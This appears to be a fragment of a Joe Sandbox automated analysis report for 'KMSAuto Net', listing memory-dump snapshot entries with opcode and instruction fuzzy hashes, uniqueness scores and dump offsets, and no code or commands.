• Snapshot File: hcaresult_2_2_104d000_KMSAuto Net.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a90e2d75b7f6a9c87f0360fe8bec41a54390f32499d0736dc08def5fd1b30036
• Instruction ID: 47223e9feab00de45fc18b5d816c890c8d115c91cd5b8a29f963d94b60aae0f2
• Opcode Fuzzy Hash: a90e2d75b7f6a9c87f0360fe8bec41a54390f32499d0736dc08def5fd1b30036
• Instruction Fuzzy Hash: 08214CB5604240EFDB01DF58DAC0B16BBA5FBA4324F24C6BDE8894B342C336D846CB61
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.515335372.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_104d000_KMSAuto Net.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 84d68082fe0cf1274bcb9aa7cf2e3d118c151b9c22430d108c525abe821850aa
• Instruction ID: 94c855afd297b9804a2c9350dba45dcf67f9b4483d67fa4311c6d008c63c25a7
• Opcode Fuzzy Hash: 84d68082fe0cf1274bcb9aa7cf2e3d118c151b9c22430d108c525abe821850aa
• Instruction Fuzzy Hash: F42125B5604240DFDB15CF58D9C0B16BBA5FB94354F24C9BDE8894B246C33BD846CB61
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.515335372.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_104d000_KMSAuto Net.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 24fc3e953e98f549b7ed58a82471c6a6124121723560fb9cfddaa372b2479c67
• Instruction ID: 909c8f01a74608fc37a432b463dfc7e5262283de2c29a985ce6aa03179898fbb
• Opcode Fuzzy Hash: 24fc3e953e98f549b7ed58a82471c6a6124121723560fb9cfddaa372b2479c67
• Instruction Fuzzy Hash: 44217FB55083809FCB02CF54D994B11BFB1EB46214F28C5EAD8858B297C33A9846CB62
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.515335372.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_104d000_KMSAuto Net.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
• Instruction ID: 1a23760682c1d6b6b9a2559fd204774fa8e18f51a1b3f306330024fa9b598b71
• Opcode Fuzzy Hash: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
• Instruction Fuzzy Hash: 3A11BEB5504280DFDB42CF54C6C4B15BBA1FB94224F28C6ADD8894B656C33AD44ACB51
Uniqueness
Uniqueness Score: -1.00%